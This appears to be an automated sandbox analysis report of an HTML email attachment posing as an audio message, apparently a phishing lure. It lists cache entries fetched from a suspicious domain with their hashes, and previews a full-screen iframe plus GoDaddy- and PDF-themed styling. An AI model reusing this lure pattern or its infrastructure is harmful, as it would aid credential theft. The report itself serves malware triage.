SHA-512:	0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/rswomGMWMyQmcsyvBPwhLheb8uv8O2IYKjL4mHsKPND450ef200
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

Chrome Cache Entry: 94

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 97

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
Category:	downloaded
Size (bytes):	93276
Entropy (8bit):	7.997636438159837
Encrypted:	true
SSDEEP:
MD5:	BCD7983EA5AA57C55F6758B4977983CB
SHA1:	EF3A009E205229E07FB0EC8569E669B11C378EF1
SHA-256:	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
SHA-512:	E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/efGIvrczvqazfi2el7uMWyw2E34FN8DhUqcrDmn100
Preview:	wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.\|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X\|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~\|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.\|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..\|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

Chrome Cache Entry: 98

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (23398), with no line terminators
Category:	downloaded
Size (bytes):	23398
Entropy (8bit):	5.104409455331282
Encrypted:	false
SSDEEP:
MD5:	C1C51D30D5E7094136F2D828349E520F
SHA1:	10AE8971AD7A8798BC9732707FE4896B57541557
SHA-256:	0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
SHA-512:	7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/128mcrDT7cGdPwuabkDcVc6718
Preview:	,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit},input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	49602
Entropy (8bit):	7.881935507115631
Encrypted:	false
SSDEEP:
MD5:	DB783743CD246FF4D77F4A3694285989
SHA1:	B9466716904457641B7831868B47162D8D378D41
SHA-256:	5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
SHA-512:	E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/ijNW7GrBd1dg1UxPXVeTSYZhESuzYsPmxklMpyEnZTOc0OvX7qeNqqvQ8lYeUAef210
Preview:	.PNG........IHDR...p..........{......sBIT....\|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.\|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`\|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T.....(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$

Static File Info

General

File type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (2391), with CRLF line terminators
Entropy (8bit):	5.3758289649448745
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	Play_NewMessage_17April2024_Audio.htm
File size:	2'901 bytes
MD5:	eb9941dab64b5919987bd0be63185382
SHA1:	990eea5447ba92d0b3d633183776ef0a13c21146
SHA256:	f748db33f47984e17ccf0388ae77704a95d089c9ce8319cab4d3c3255cc47b20
SHA512:	d7866cfe0e759877063c74ead58074cbf07cff700568b18de09213b1d2ef58153b5c08075c75ce466ca56c24d077dedcb4053d3f0e17759b6fbbf07614587e93
SSDEEP:	48:4aCgJVXzRFVFKfVVDwgp4by/4sRlBQUKUajGwwCTazsfVnspklDBaceQ2Bn4j24s:3vEVDN4by/Rl4UQLTazSnkkxBA4s
TLSH:	C0512D23F7E1F85502A31FB0791E00DAE83F8B8FB88C96E5A485E5B0B871100C89697C
File Content Preview:	...<!DOCTYPE html><html><iframe id="1QkO78Y3LXIIf4Xy" frameborder="0" allowfullscreen allow="same-origin allow-top-navigation allow-modals allow-scripts allow-popups-to-escape-sandbox allow-forms" style="position: fixed;inset: 0px;width:-webkit-fill-avail

File Icon


Icon Hash:	173149cccc490307